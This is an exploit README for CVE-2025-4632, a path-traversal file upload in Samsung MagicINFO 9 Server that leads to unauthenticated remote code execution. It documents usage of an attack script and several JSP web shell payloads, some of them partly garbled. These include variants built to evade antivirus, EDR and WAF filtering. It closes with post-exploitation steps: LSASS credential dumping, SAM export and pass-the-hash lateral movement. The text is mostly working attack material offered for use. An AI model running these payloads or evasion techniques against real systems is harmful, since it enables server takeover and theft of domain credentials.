Share
## https://sploitus.com/exploit?id=2C3563BC-D6C6-5CE5-AEDB-7765A772CDF6
# Samsung MagicINFO 9 Server Exploit (CVE-2025-4632)

This repository contains a Python replication script for CVE-2025-4632, an Unauthenticated Remote Code Execution (RCE) vulnerability in Samsung MagicINFO 9 Server (versions prior to 21.1052).

The vulnerability exists due to an improper limitation of a pathname in the `SWUpdateFileUploader` servlet. By utilizing path traversal (`../../`), an unauthenticated attacker can write arbitrary files with `SYSTEM` authority, leading to full server compromise.

## Credits & Acknowledgements
*   **Original Discovery & Template Author:** `s4e-io` (from the ProjectDiscovery Nuclei community  ([http/cves/2025/CVE-2025-4632.yaml](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-4632.yaml))).
*   **Methodology:** This script is a direct programmatic implementation of the logic defined in the `CVE-2025-4632` Nuclei template.

## How it Works
The script automates the process of generating a legitimate-looking device update request. It exploits the `fileName` parameter by injecting directory traversal sequences to break out of the intended upload directory and write a file directly to the web root (`/MagicInfo/`).

The script performs two steps:
1.  **POST Request:** Sends the payload to `/MagicInfo/servlet/SWUpdateFileUploader` with the traversal path.
2.  **GET Request (Verification):** Automatically attempts to access the uploaded file at `/MagicInfo/` to confirm successful exploitation.

## Usage

```bash
python exploit_magicinfo.py -t  -f  -d 
```

### Arguments:
*   `-t` / `--target`: The base URL of the target (e.g., `http://192.168.1.100:7001`).
*   `-f` / `--filename`: The name of the file to create (e.g., `shell.jsp`).
*   `-d` / `--data`: The raw content to write into the file.

---

## Payload Examples for Penetration Testing

The following payloads were successfully tested during assessment activities. They are designed to prove impact while navigating endpoint security controls.

### 1. Benign Proof of Concept (Impact Verification)
Used to safely confirm JSP execution without triggering Antivirus or EDR.

```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f poc.jsp -d ''
```
*Access:* `http://:7001/MagicInfo/poc.jsp`

### 2. Standard Command Execution Shell
A standard JSP web shell. **Note:** This may be caught and quarantined by modern AV/EDR solutions resulting in a `404 Not Found` upon verification.

```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f cmd.jsp -d '"); while ((l = in.readLine()) != null) { out.println(l); } out.print(""); } %>'
```
*Access:* `http://:7001/MagicInfo/cmd.jsp?c=whoami`

### 3. Obfuscated Command Execution (EDR/AV Bypass)
Used when the standard shell is blocked. This payload uses Java Reflection to hide the `Runtime.getRuntime().exec` signature from static analysis.

```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f bypass.jsp -d '"+(s.hasNext()?s.next():"")+"");} %>'
```
*Access:* `http://:7001/MagicInfo/bypass.jsp?c=whoami /all`

### 4. Advanced Base64 Obfuscated Shell (WAF & URL Parsing Bypass)
**Highly Recommended for Complex Commands:** If you encounter `400 Bad Request` errors when trying to run commands with spaces, backslashes, or special characters (e.g., `dir c:\`), the server's strict URI validation or a WAF is blocking the request. 

This advanced payload expects the command to be **Base64 encoded** in the URL. It decodes it server-side before execution, completely bypassing URL filtering and obscuring the command from network monitors.

```bash
python exploit_magicinfo.py -t http://192.168.29.105:7001 -f b64.jsp -d '"+(s.hasNext()?s.next():"")+"");} %>'
```

**Usage Examples:**
Encode your command to Base64 locally (e.g., `echo -n "dir c:\" | base64`), then pass it to the `c` parameter.

*   `whoami` -> `d2hvYW1p`
    *   *Access:* `http://:7001/MagicInfo/b64.jsp?c=d2hvYW1p`
*   `tasklist /svc` -> `dGFza2xpc3QgL3N2Yw==`
    *   *Access:* `http://:7001/MagicInfo/b64.jsp?c=dGFza2xpc3QgL3N2Yw==`
*   `dir c:\` -> `ZGlyIGM6XA==`
    *   *Access:* `http://:7001/MagicInfo/b64.jsp?c=ZGlyIGM6XA==`

---

## Post-Exploitation & Risk Reporting
When running the `whoami` command via the shell, you will likely observe `NT AUTHORITY\SYSTEM`. In an Active Directory environment, this access level is sufficient to:
1.  Extract Local Security Authority Subsystem Service (LSASS) memory to harvest Domain Admin credentials.
2.  Export the local SAM database for Pass-the-Hash lateral movement.
3.  Query Active Directory for misconfigurations using the host's machine account.

*Disclaimer: This script is for educational and authorized penetration testing purposes only.*